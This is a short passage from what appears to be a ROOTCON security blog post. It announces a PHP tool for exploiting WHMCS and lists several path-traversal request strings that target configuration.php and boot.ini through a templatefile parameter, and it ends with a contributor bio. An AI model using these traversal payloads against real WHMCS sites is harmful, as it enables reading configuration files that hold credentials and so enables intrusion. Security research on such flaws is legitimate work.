But with the help of another friend whose name is lufi, we were able to materialize the same tool but this time it is coded in PHP and is user friendly. It is still aimed at exploiting WHMCS but we allow users to choose their own payload.
cart.php?a=projectx&templatefile=../../../configuration.php"clients/cart.php?a=projectx&templatefile=../../../configuration.php"submitticket.php?step=projectx&templatefile=../../../../../../../../../boot.iniclientarea.php?action=projectx&templatefile=../../configuration.phpreports.php?report=../../../../../../../boot.ini
You can download the full script here.
About the Contributor:
Shipcode
is a prolific blogger of ROOTCON and at the same time an InfoSec
enthusiast from Cebu. He was inspired to join ROOTCON as part of the
core team to share his knowledge in information security. He encourages
other like minded individuals to come forward and share their knowledge
through blogging right here at ROOTCON Blog section.
ROOTCON is managed by like minded InfoSec professionals across the Philippines. All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.